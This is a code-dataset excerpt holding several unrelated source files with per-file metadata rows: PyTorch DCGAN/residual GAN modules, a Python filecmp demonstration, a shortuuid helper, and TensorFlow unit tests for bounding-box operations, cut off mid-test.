        # Transition i doubles the channel count; forward() then halves the
        # spatial resolution by average pooling.
        self.transitions_conv = nn.ModuleList(
            [nn.Conv2d(channels(i), channels(i + 1), (3, 3), padding=(1, 1))
             for i in range(blocks)])
        self.transitions_norm = nn.ModuleList(
            [nn.LayerNorm([channels(i + 1), *spatial(i)]) for i in range(blocks)])
        self.transitions_activ = nn.ModuleList(
            [nn.PReLU(channels(i + 1)) for i in range(blocks)])

        self.final_linear = nn.Linear(hidden_size * 2 ** blocks, 1)

    def forward(self, inputs):
        """Score a batch of images; returns logits of shape (batch, 1)."""
        x = self.initial_conv(inputs)
        x = self.initial_activ(x)
        x = self.initial_norm(x)
        for i in range(self.blocks):
            # First residual unit.
            fx = self.norm1[i](self.activ1[i](self.convs1[i](x)))
            fx = self.norm2[i](self.activ2[i](self.convs2[i](fx)))
            x = x + fx
            # Second residual unit.
            fx = self.norm3[i](self.activ3[i](self.convs3[i](x)))
            fx = self.norm4[i](self.activ4[i](self.convs4[i](fx)))
            x = x + fx
            # Transition: double channels, then halve the spatial size.
            x = self.transitions_conv[i](x)
            x = self.transitions_activ[i](x)
            x = self.transitions_norm[i](x)
            x = F.avg_pool2d(x, kernel_size=(2, 2))
        # Global average pool over the remaining spatial extent, then score.
        x = F.avg_pool2d(x, kernel_size=(x.shape[-2], x.shape[-1]))
        x = x.view(x.shape[0], -1)
        x = self.final_linear(x)
        return x
class DCGANGenerator(nn.Module):
    """DCGAN-style generator: project and reshape the latent vector, then
    apply ``blocks`` stages of conv + PReLU + LayerNorm + 2x upsampling,
    finishing with a 5x5 convolution and tanh so outputs lie in [-1, 1].
    """

    def __init__(self, input_size, image_channels=1, height=32, length=32,
                 hidden_size=64, blocks=4):
        super(DCGANGenerator, self).__init__()
        self.hidden_size = hidden_size
        self.blocks = blocks
        self.height = height
        self.length = length
        self.mult = 2 ** blocks

        # Size of the seed feature map produced from the latent vector.
        # Parenthesized so it always matches the .view() in forward().
        flat = hidden_size * self.mult * (height // self.mult) * (length // self.mult)
        self.initial_linear = nn.Linear(input_size, flat)
        self.initial_activ = nn.PReLU(flat)
        self.initial_norm = nn.LayerNorm(flat)

        # Stage i halves the channel count; forward() doubles the spatial
        # size afterwards.  The LayerNorm shapes track the post-conv,
        # pre-upsample feature map.
        self.convs = nn.ModuleList(
            [nn.Conv2d(hidden_size * 2 ** (blocks - i),
                       hidden_size * 2 ** (blocks - i - 1),
                       (5, 5), padding=(2, 2)) for i in range(blocks)])
        self.activ = nn.ModuleList(
            [nn.PReLU(hidden_size * 2 ** (blocks - i - 1)) for i in range(blocks)])
        self.norm = nn.ModuleList(
            [nn.LayerNorm([hidden_size * 2 ** (blocks - i - 1),
                           height // (2 ** (blocks - i)),
                           length // (2 ** (blocks - i))])
             for i in range(blocks)])

        self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))
        self.final_activ = nn.Tanh()

    def forward(self, inputs):
        """Map latents of shape (batch, input_size) to images of shape
        (batch, image_channels, height, length) with values in [-1, 1]."""
        x = self.initial_linear(inputs)
        x = self.initial_activ(x)
        x = self.initial_norm(x)
        x = x.view(x.shape[0], self.hidden_size * self.mult,
                   self.height // self.mult, self.length // self.mult)
        for i in range(self.blocks):
            x = self.convs[i](x)
            x = self.activ[i](x)
            x = self.norm[i](x)
            # F.upsample is deprecated; F.interpolate is the drop-in
            # replacement (same default 'nearest' mode).
            x = F.interpolate(x, scale_factor=2)
        x = self.final_conv(x)
        x = self.final_activ(x)
        return x
class DCGANDiscriminator(nn.Module):
    """DCGAN-style convolutional discriminator.

    Each stage doubles the channel count with a 5x5 convolution and then
    halves the spatial resolution by 2x average pooling; a final linear
    layer maps the flattened features to a single realness score.
    """

    def __init__(self, image_channels=1, height=32, length=32, hidden_size=64,
                 blocks=4):
        super(DCGANDiscriminator, self).__init__()
        self.hidden_size = hidden_size
        self.blocks = blocks
        # Stem: lift the image into hidden_size feature maps at full resolution.
        self.initial_conv = nn.Conv2d(image_channels, hidden_size, (5, 5), padding=(2, 2))
        self.initial_norm = nn.LayerNorm([hidden_size, height, length])
        self.initial_activ = nn.PReLU(hidden_size)
        # Stage `stage` maps hidden_size*2**stage channels to twice as many;
        # the LayerNorm shapes track the spatial size *before* pooling.
        self.convs = nn.ModuleList(
            nn.Conv2d(hidden_size * 2 ** stage, hidden_size * 2 ** (stage + 1),
                      (5, 5), padding=(2, 2))
            for stage in range(blocks))
        self.norm = nn.ModuleList(
            nn.LayerNorm([hidden_size * 2 ** (stage + 1),
                          height // (2 ** stage), length // (2 ** stage)])
            for stage in range(blocks))
        self.activ = nn.ModuleList(
            nn.PReLU(hidden_size * 2 ** (stage + 1)) for stage in range(blocks))
        self.final_linear = nn.Linear(
            hidden_size * 2 ** blocks * height // (2 ** blocks) * length // (2 ** blocks), 1)

    def forward(self, inputs):
        """Score a batch of images; returns logits of shape (batch, 1)."""
        features = self.initial_activ(self.initial_norm(self.initial_conv(inputs)))
        for conv, norm, activ in zip(self.convs, self.norm, self.activ):
            features = F.avg_pool2d(activ(norm(conv(features))), kernel_size=(2, 2))
        flattened = features.view(features.shape[0], -1)
        return self.final_linear(flattened)
| 44.185328 | 161 | 0.543254 | 1,584 | 11,444 | 3.8125 | 0.048611 | 0.12916 | 0.091075 | 0.07286 | 0.96208 | 0.95943 | 0.956615 | 0.952972 | 0.948336 | 0.944693 | 0 | 0.033462 | 0.297536 | 11,444 | 258 | 162 | 44.356589 | 0.717751 | 0 | 0 | 0.835749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038647 | false | 0 | 0.009662 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
39a9d83765bc474065272e524eab67f64472854e | 844 | py | Python | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | 3 | 2018-08-14T09:33:52.000Z | 2022-03-21T12:31:58.000Z | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | src/lesson_file_system/filecmp_cmp.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | import filecmp
# Demonstrate filecmp.cmp: for each pair, compare first with the default
# shallow comparison (os.stat signatures only), then byte-by-byte with
# shallow=False.
_COMPARISONS = [
    ('common_file :', 'example/dir1/common_file',
     'example/dir2/common_file'),
    ('not_the_same:', 'example/dir1/not_the_same',
     'example/dir2/not_the_same'),
    ('identical :', 'example/dir1/file_only_in_dir1',
     'example/dir1/file_only_in_dir1'),
]

for label, left, right in _COMPARISONS:
    print(label, end=' ')
    print(filecmp.cmp(left, right), end=' ')
    print(filecmp.cmp(left, right, shallow=False))
| 32.461538 | 52 | 0.587678 | 101 | 844 | 4.643564 | 0.178218 | 0.187633 | 0.191898 | 0.230277 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0.84435 | 0 | 0.0256 | 0.259479 | 844 | 25 | 53 | 33.76 | 0.7248 | 0 | 0 | 0.545455 | 0 | 0 | 0.427725 | 0.374408 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.045455 | 0 | 0.045455 | 0.409091 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
84603189868768c4b0989f6da988b2155e69eb51 | 159 | py | Python | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | ch/config.py | zuiwan/CodingHub-CLI | 9ced732de351412f1fd32b3a5eb67117e42779f6 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from shortuuid import uuid
def generate_uuid():
    """Create a short unique identifier.

    Used for naming experiments and modules.
    """
    identifier = uuid()
    return identifier
| 14.454545 | 58 | 0.660377 | 21 | 159 | 4.952381 | 0.809524 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 0.251572 | 159 | 10 | 59 | 15.9 | 0.865546 | 0.427673 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
083abbbb06fcf30057e5bbc8a9ab46f3255cace4 | 36,769 | py | Python | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | 1 | 2020-09-28T13:07:19.000Z | 2020-09-28T13:07:19.000Z | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | null | null | null | official/vision/beta/ops/box_ops_test.py | TUDelftHao/models | faf0c2dc442ceaa8425aff73abd00f92f3137b7b | [
"Apache-2.0"
] | 1 | 2020-09-28T13:07:23.000Z | 2020-09-28T13:07:23.000Z | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for box_ops.py."""
# Import libraries
import numpy as np
import tensorflow as tf
from official.vision.beta.ops import box_ops
def _transform_boxes_on_tpu_and_cpu(transform_fn, boxes, *args):
  """Runs `transform_fn(boxes, *args)` under a TPU strategy scope and on CPU.

  Returns:
    A pair (tpu_outputs, cpu_outputs) with every tensor converted to numpy.
  """
  def _to_numpy(structure):
    return tf.nest.map_structure(lambda t: t.numpy(), structure)

  # TPU pass: build the op inside the TPU strategy scope.
  tpu_strategy = tf.distribute.experimental.TPUStrategy()
  with tpu_strategy.scope():
    tpu_op = transform_fn(boxes, *args)
  tpu_outputs = _to_numpy(tpu_op)
  # CPU pass: the same computation without a strategy scope.
  cpu_outputs = _to_numpy(transform_fn(boxes, *args))
  return tpu_outputs, cpu_outputs
class ConvertBoxesTest(tf.test.TestCase):

  def testConvertBoxes(self):
    # Input boxes in (y1, x1, y2, x2) order.
    input_boxes = np.array([[0, 0, 1, 2], [0.2, 0.1, 1.2, 1.1]])
    # Expected output in (x1, y1, width, height) order.
    expected = np.array([[0, 0, 2, 1], [0.1, 0.2, 1, 1]])
    converted = box_ops.yxyx_to_xywh(input_boxes)
    self.assertNDArrayNear(converted, expected, 1e-7)
class JitterBoxesTest(tf.test.TestCase):

  def testJitterBoxes(self):
    original_np = np.array(
        [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
         [0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]],
        dtype=np.float32)
    # Largest box side length; scales the tolerance below.
    widths = original_np[:, 3] - original_np[:, 1]
    heights = original_np[:, 2] - original_np[:, 0]
    max_size = max(np.amax(widths), np.amax(heights))
    noise_scale = 0.025
    boxes = tf.constant(original_np)

    def jitter_fn(input_boxes, arg_noise_scale):
      return box_ops.jitter_boxes(input_boxes, arg_noise_scale)

    jittered_tpu, jittered_cpu = _transform_boxes_on_tpu_and_cpu(
        jitter_fn, boxes, noise_scale)
    # The jittered boxes should stay within 10 stds of the inputs.
    tolerance = noise_scale * max_size * 10
    self.assertNDArrayNear(jittered_tpu, original_np, tolerance)
    self.assertNDArrayNear(jittered_cpu, original_np, tolerance)
class NormalizeBoxesTest(tf.test.TestCase):
  """Tests box_ops.normalize_boxes for 1D/2D/3D boxes and every supported
  image_shape form (python list, vector, broadcastable tensor, and a tensor
  matching the boxes' leading dimensions)."""

  def _check(self, boxes, image_shape, expected):
    # The op must agree between TPU and CPU, and both must match the
    # hand-computed expectation.
    normalized_tpu, normalized_cpu = _transform_boxes_on_tpu_and_cpu(
        box_ops.normalize_boxes, boxes, image_shape)
    self.assertNDArrayNear(normalized_tpu, normalized_cpu, 1e-5)
    self.assertNDArrayNear(normalized_tpu, expected, 1e-5)

  def testNormalizeBoxes1DWithImageShapeAsList(self):
    self._check(tf.constant([10, 30, 40, 90], tf.float32),
                [50, 100],
                [0.2, 0.3, 0.8, 0.9])

  def testNormalizeBoxes1DWithImageShapeAsTensor(self):
    self._check(tf.constant([10, 30, 40, 90], tf.float32),
                tf.constant([50, 100], tf.int32),
                [0.2, 0.3, 0.8, 0.9])

  def testNormalizeBoxes2DWithImageShapeAsList(self):
    self._check(
        tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32),
        [50, 100],
        [[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]])

  def testNormalizeBoxes2DWithImageShapeAsVector(self):
    self._check(
        tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32),
        tf.constant([50, 100], dtype=tf.int32),
        [[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]])

  def testNormalizeBoxes2DWithImageShapeAsBroadcastableTensor(self):
    self._check(
        tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32),
        tf.constant([[50, 100]], tf.int32),
        [[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]])

  def testNormalizeBoxes2DWithImageShapeAsSameShapeTensor(self):
    self._check(
        tf.constant([[10, 30, 40, 90], [30, 10, 40, 50]], tf.float32),
        tf.constant([[50, 100], [50, 100]], tf.int32),
        [[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]])

  def testNormalizeBoxes3DWithImageShapeAsList(self):
    self._check(
        tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
                     [[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32),
        [50, 100],
        [[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
         [[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]])

  def testNormalizeBoxes3DWithImageShapeAsVector(self):
    self._check(
        tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
                     [[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32),
        tf.constant([50, 100], tf.int32),
        [[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
         [[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]])

  def testNormalizeBoxes3DWithImageShapeAsBroadcastableTensor(self):
    # The second batch element uses a 10x larger image, so its normalized
    # coordinates are 10x smaller.
    self._check(
        tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
                     [[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32),
        tf.constant([[[50, 100]], [[500, 1000]]], tf.int32),
        [[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
         [[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]])

  def testNormalizeBoxes3DWithImageShapeAsSameShapeTensor(self):
    self._check(
        tf.constant([[[10, 30, 40, 90], [30, 10, 40, 50]],
                     [[20, 40, 50, 80], [30, 50, 40, 90]]], tf.float32),
        tf.constant([[[50, 100], [50, 100]], [[500, 1000], [500, 1000]]],
                    tf.int32),
        [[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
         [[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]])
class DenormalizeBoxesTest(tf.test.TestCase):
  """Tests box_ops.denormalize_boxes (inverse of normalize_boxes) for
  1D/2D/3D boxes and every supported image_shape form."""

  def _check(self, boxes, image_shape, expected):
    # TPU and CPU must agree, and both must match the expected pixel boxes.
    denormalized_tpu, denormalized_cpu = _transform_boxes_on_tpu_and_cpu(
        box_ops.denormalize_boxes, boxes, image_shape)
    self.assertNDArrayNear(denormalized_tpu, denormalized_cpu, 1e-5)
    self.assertNDArrayNear(denormalized_tpu, expected, 1e-5)

  def testDenormalizeBoxes1DWithImageShapeAsList(self):
    self._check(tf.constant([0.2, 0.3, 0.8, 0.9], tf.float32),
                [50, 100],
                [10, 30, 40, 90])

  def testDenormalizeBoxes1DWithImageShapeAsTensor(self):
    self._check(tf.constant([0.2, 0.3, 0.8, 0.9], tf.float32),
                tf.constant([50, 100], tf.int32),
                [10, 30, 40, 90])

  def testDenormalizeBoxes2DWithImageShapeAsList(self):
    self._check(
        tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], tf.float32),
        [50, 100],
        [[10, 30, 40, 90], [30, 10, 40, 50]])

  def testDenormalizeBoxes2DWithImageShapeAsVector(self):
    self._check(
        tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], tf.float32),
        tf.constant([50, 100], dtype=tf.int32),
        [[10, 30, 40, 90], [30, 10, 40, 50]])

  def testDenormalizeBoxes2DWithImageShapeAsBroadcastableTensor(self):
    self._check(
        tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], tf.float32),
        tf.constant([[50, 100]], tf.int32),
        [[10, 30, 40, 90], [30, 10, 40, 50]])

  def testDenormalizeBoxes2DWithImageShapeAsSameShapeTensor(self):
    self._check(
        tf.constant([[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]], tf.float32),
        tf.constant([[50, 100], [50, 100]], tf.int32),
        [[10, 30, 40, 90], [30, 10, 40, 50]])

  def testDenormalizeBoxes3DWithImageShapeAsList(self):
    self._check(
        tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
                     [[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]],
                    tf.float32),
        [50, 100],
        [[[10, 30, 40, 90], [30, 10, 40, 50]],
         [[20, 40, 50, 80], [30, 50, 40, 90]]])

  def testDenormalizeBoxes3DWithImageShapeAsVector(self):
    self._check(
        tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
                     [[0.4, 0.4, 1.0, 0.8], [0.6, 0.5, 0.8, 0.9]]],
                    tf.float32),
        tf.constant([50, 100], tf.int32),
        [[[10, 30, 40, 90], [30, 10, 40, 50]],
         [[20, 40, 50, 80], [30, 50, 40, 90]]])

  def testDenormalizeBoxes3DWithImageShapeAsBroadcastableTensor(self):
    # The second batch element uses a 10x larger image.
    self._check(
        tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
                     [[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]],
                    tf.float32),
        tf.constant([[[50, 100]], [[500, 1000]]], tf.int32),
        [[[10, 30, 40, 90], [30, 10, 40, 50]],
         [[20, 40, 50, 80], [30, 50, 40, 90]]])

  def testDenormalizeBoxes3DWithImageShapeAsSameShapeTensor(self):
    self._check(
        tf.constant([[[0.2, 0.3, 0.8, 0.9], [0.6, 0.1, 0.8, 0.5]],
                     [[0.04, 0.04, 0.1, 0.08], [0.06, 0.05, 0.08, 0.09]]],
                    tf.float32),
        tf.constant([[[50, 100], [50, 100]], [[500, 1000], [500, 1000]]],
                    tf.int32),
        [[[10, 30, 40, 90], [30, 10, 40, 50]],
         [[20, 40, 50, 80], [30, 50, 40, 90]]])
class ClipBoxesTest(tf.test.TestCase):
  """Tests box_ops.clip_boxes with the image shape given in several forms."""

  # All of these boxes already fit inside a 3x3 image, so clipping is a no-op.
  _BOXES = [[0, 0, 1, 1], [0, 0.1, 1, 1.1], [0, 0.3, 1, 1.3],
            [0, 0.5, 1, 1.5], [0, 0.7, 1, 1.7], [0, 1.9, 1, 1.9]]

  def _check(self, image_shape):
    boxes = tf.constant(self._BOXES)
    clipped_tpu, clipped_cpu = _transform_boxes_on_tpu_and_cpu(
        box_ops.clip_boxes, boxes, image_shape)
    self.assertAllClose(clipped_tpu, clipped_cpu)
    self.assertAllClose(clipped_tpu, self._BOXES)

  def testClipBoxesImageShapeAsList(self):
    self._check([3, 3])

  def testClipBoxesImageShapeAsVector(self):
    self._check(np.array([3, 3], dtype=np.float32))

  def testClipBoxesImageShapeAsTensor(self):
    # One (height, width) row per box.
    self._check(tf.constant([[3, 3], [3, 3], [3, 3], [3, 3], [3, 3], [3, 3]],
                            dtype=tf.float32))
class EncodeDecodeBoxesTest(tf.test.TestCase):
  """encode_boxes followed by decode_boxes with the same anchors and
  weights must recover the original boxes."""

  def _check_roundtrip(self, boxes_list, anchors_list):
    boxes_np = np.array(boxes_list)
    boxes = tf.constant(boxes_np, dtype=tf.float32)
    anchors = tf.constant(anchors_list, dtype=tf.float32)
    weights = [1.0, 1.0, 1.0, 1.0]

    def roundtrip_fn(input_boxes, input_anchors):
      encoded = box_ops.encode_boxes(input_boxes, input_anchors, weights)
      return box_ops.decode_boxes(encoded, input_anchors, weights)

    decoded_tpu, decoded_cpu = _transform_boxes_on_tpu_and_cpu(
        roundtrip_fn, boxes, anchors)
    self.assertNDArrayNear(decoded_tpu, decoded_cpu, 1e-5)
    self.assertNDArrayNear(decoded_tpu, boxes_np, 1e-5)

  def test_encode_decode_boxes(self):
    self._check_roundtrip(
        [[[1.0, 2.0, 3.0, 4.0], [2.0, 3.0, 4.0, 5.0]],
         [[4.0, 5.0, 6.0, 7.0], [5.0, 6.0, 7.0, 8.0]]],
        [[[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]],
         [[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]]])

  def test_encode_decode_boxes_batch_broadcast(self):
    # Anchors with batch size 1 broadcast against batch-2 boxes.
    self._check_roundtrip(
        [[[1.0, 2.0, 3.0, 4.0], [2.0, 3.0, 4.0, 5.0]],
         [[4.0, 5.0, 6.0, 7.0], [5.0, 6.0, 7.0, 8.0]]],
        [[[1.5, 2.5, 3.5, 4.5], [2.5, 3.5, 4.5, 5.5]]])
class FilterBoxesTest(tf.test.TestCase):

  def test_filter_boxes_batch(self):
    # Batch 0 rows: [too small, valid, outside the image];
    # batch 1 rows: [outside the image, too small, valid].
    boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
                          [7.0, 4.0, 9.5, 6.5]],
                         [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
                          [4.0, 1.0, 7.0, 4.0]]])
    scores_np = np.array([[0.9, 0.7, 0.5], [0.11, 0.22, 0.33]])
    # Filtered-out boxes are zeroed and their scores set to 0.
    expected_boxes_np = np.array(
        [[[0.0, 0.0, 0.0, 0.0], [2.0, 3.0, 4.5, 5.5], [0.0, 0.0, 0.0, 0.0]],
         [[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [4.0, 1.0, 7.0, 4.0]]])
    expected_scores_np = np.array([[0.0, 0.7, 0.0], [0.0, 0.0, 0.33]])
    boxes = tf.constant(boxes_np, dtype=tf.float32)
    scores = tf.constant(scores_np, dtype=tf.float32)
    image_shape = tf.expand_dims(
        tf.constant([[8, 8], [8, 8]], dtype=tf.int32), axis=1)
    min_size_threshold = 2.0

    def filter_fn(arg_boxes, arg_scores, arg_image_shape):
      return box_ops.filter_boxes(
          arg_boxes, arg_scores, arg_image_shape, min_size_threshold)

    results_tpu, results_cpu = _transform_boxes_on_tpu_and_cpu(
        filter_fn, boxes, scores, image_shape)
    boxes_tpu, scores_tpu = results_tpu
    boxes_cpu, scores_cpu = results_cpu
    self.assertNDArrayNear(boxes_tpu, boxes_cpu, 1e-5)
    self.assertNDArrayNear(scores_tpu, scores_cpu, 1e-5)
    self.assertNDArrayNear(boxes_tpu, expected_boxes_np, 1e-5)
    self.assertNDArrayNear(scores_tpu, expected_scores_np, 1e-5)
class FilterBoxesByScoresTest(tf.test.TestCase):

  def test_filter_boxes_by_scores_batch(self):
    # With threshold 0.5: batch 0 keeps entries 1 and 2, batch 1 keeps
    # only entry 2.
    boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
                          [7.0, 4.0, 9.5, 6.5]],
                         [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
                          [4.0, 1.0, 7.0, 4.0]]])
    scores_np = np.array([[0.1, 0.7, 0.6], [0.11, 0.22, 0.53]])
    # Filtered-out entries get zeroed boxes and a score of -1.
    expected_boxes_np = np.array(
        [[[0.0, 0.0, 0.0, 0.0], [2.0, 3.0, 4.5, 5.5], [7.0, 4.0, 9.5, 6.5]],
         [[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [4.0, 1.0, 7.0, 4.0]]])
    expected_scores_np = np.array([[-1.0, 0.7, 0.6], [-1.0, -1.0, 0.53]])
    boxes = tf.constant(boxes_np, dtype=tf.float32)
    scores = tf.constant(scores_np, dtype=tf.float32)
    min_score_threshold = 0.5

    def filter_fn(arg_boxes, arg_scores):
      return box_ops.filter_boxes_by_scores(
          arg_boxes, arg_scores, min_score_threshold)

    results_tpu, results_cpu = _transform_boxes_on_tpu_and_cpu(
        filter_fn, boxes, scores)
    boxes_tpu, scores_tpu = results_tpu
    boxes_cpu, scores_cpu = results_cpu
    self.assertNDArrayNear(boxes_tpu, boxes_cpu, 1e-5)
    self.assertNDArrayNear(scores_tpu, scores_cpu, 1e-5)
    self.assertNDArrayNear(boxes_tpu, expected_boxes_np, 1e-5)
    self.assertNDArrayNear(scores_tpu, expected_scores_np, 1e-5)
class GatherInstancesTest(tf.test.TestCase):

  # Shared per-batch box data used by both tests below.
  _BOXES = [[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
             [7.0, 4.0, 9.5, 6.5]],
            [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
             [4.0, 1.0, 7.0, 4.0]]]

  def test_gather_instances(self):
    boxes = tf.constant(self._BOXES, dtype=tf.float32)
    indices = tf.constant([[2, 0], [0, 1]], dtype=tf.int32)
    gathered_boxes = box_ops.gather_instances(indices, boxes)
    # Rows are selected per batch element according to `indices`.
    expected_boxes = np.array(
        [[[7.0, 4.0, 9.5, 6.5], [1.0, 2.0, 1.5, 2.5]],
         [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0]]])
    self.assertNDArrayNear(expected_boxes, gathered_boxes, 1e-5)

  def test_gather_instances_with_multiple_inputs(self):
    boxes = tf.constant(self._BOXES, dtype=tf.float32)
    classes = tf.constant([[1, 2, 3], [20, 30, 40]], dtype=tf.int32)
    indices = tf.constant([[2, 0], [0, 1]], dtype=tf.int32)
    # Every extra tensor is gathered with the same indices as the boxes.
    gathered_boxes, gathered_classes = box_ops.gather_instances(
        indices, boxes, classes)
    expected_boxes = np.array(
        [[[7.0, 4.0, 9.5, 6.5], [1.0, 2.0, 1.5, 2.5]],
         [[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0]]])
    expected_classes = np.array([[3, 1], [20, 30]])
    self.assertNDArrayNear(expected_boxes, gathered_boxes, 1e-5)
    self.assertAllEqual(expected_classes, gathered_classes)
class TopKBoxesTest(tf.test.TestCase):

  def _check_top_k(self, boxes_list, scores_list, expected_boxes,
                   expected_scores):
    """Selects the k=2 highest-scoring boxes; TPU/CPU must agree and match
    the expected selection."""
    boxes = tf.constant(boxes_list, dtype=tf.float32)
    scores = tf.constant(scores_list, dtype=tf.float32)

    def top_k_fn(arg_boxes, arg_scores):
      return box_ops.top_k_boxes(arg_boxes, arg_scores, k=2)

    results_tpu, results_cpu = _transform_boxes_on_tpu_and_cpu(
        top_k_fn, boxes, scores)
    top_k_boxes_tpu, top_k_scores_tpu = results_tpu
    top_k_boxes_cpu, top_k_scores_cpu = results_cpu
    self.assertNDArrayNear(top_k_boxes_tpu, top_k_boxes_cpu, 1e-5)
    self.assertNDArrayNear(top_k_scores_tpu, top_k_scores_cpu, 1e-5)
    self.assertNDArrayNear(top_k_boxes_tpu, np.array(expected_boxes), 1e-5)
    self.assertNDArrayNear(top_k_scores_tpu, np.array(expected_scores), 1e-5)

  def test_top_k_boxes_batch1(self):
    self._check_top_k(
        [[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5], [7.0, 4.0, 9.5, 6.5]]],
        [[0.9, 0.5, 0.7]],
        [[[1.0, 2.0, 1.5, 2.5], [7.0, 4.0, 9.5, 6.5]]],
        [[0.9, 0.7]])

  def test_top_k_boxes_batch2(self):
